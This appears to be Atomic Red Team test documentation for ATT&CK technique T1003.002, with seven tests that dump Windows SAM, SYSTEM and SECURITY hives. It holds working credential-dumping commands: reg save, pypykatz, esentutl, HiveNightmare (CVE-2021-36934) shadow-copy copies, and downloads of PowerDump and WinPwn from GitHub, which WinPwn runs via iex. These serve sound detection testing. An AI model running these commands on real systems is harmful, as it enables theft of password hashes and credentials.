T1003.002 - OS Credential Dumping: Security Account Manager

Description from ATT&CK

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access. A number of tools can be used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, the SAM can be extracted from the Registry with Reg: * reg save HKLM\sam sam * reg save HKLM\system system Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7) Notes: * RID 500 account is the local, built-in administrator. * RID 501 is the guest account. * User accounts start with a RID of 1,000+.

Atomic Tests


Atomic Test #1 - Registry dump of SAM, creds, and secrets

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.

Supported Platforms: Windows

auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security

Cleanup Commands:

del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul



Atomic Test #2 - Registry parse with pypykatz

Parses registry hives to obtain stored credentials.

Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.

Supported Platforms: Windows

auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002|

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

"#{venv_path}\Scripts\pypykatz" live lsa

Dependencies: Run with
1
powershell
!

Description: Computer must have python 3 installed
Check Prereq Commands:
1
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
Description: Computer must have venv configured at #{venv_path}
Check Prereq Commands:
1
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
Get Prereq Commands:
1
py -m venv "#{venv_path}"
Description: pypykatz must be installed
Check Prereq Commands:
1
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null



Atomic Test #3 - esentutl.exe SAM copy

Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.

Supported Platforms: Windows

auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM| | file_name | Name of the copied file | string | SAM| | copy_dest | Destination of the copied file | string | %temp%|

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}

Cleanup Commands:

del #{copy_dest}\#{file_name} >nul 2>&1



Atomic Test #4 - PowerDump Hashes and Usernames from Registry

Executes a hashdump by reading the hashes from the registry.

Supported Platforms: Windows

auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193

Attack Commands: Run with
1
powershell
! Elevation Required (e.g. root or admin)

1
2
3
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump

Dependencies: Run with
1
powershell
!

Description: PowerDump script must exist on disk at specified location
Check Prereq Commands:
1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"



Atomic Test #5 - dump volume shadow copy hives with certutil

Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as “HiveNightmare” or “SeriousSAM”. This can be done with a non-admin user account. CVE-2021-36934

Supported Platforms: Windows

auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | target_hive | Hive you wish to dump | string | SAM| | limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|

Attack Commands: Run with
1
command_prompt
!

for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*

Cleanup Commands:

for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)



Atomic Test #6 - dump volume shadow copy hives with System.IO.File

Dump hives from volume shadow copies with System.IO.File. CVE-2021-36934

Supported Platforms: Windows

auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | target_hive | Hive you wish to dump | string | SAM| | limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|

Attack Commands: Run with
1
powershell
!

1
2
3
4
1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}

Cleanup Commands:

1
2
3
1..#{limit} | % {
  rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}



Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes

Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb

Attack Commands: Run with
1
powershell
!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive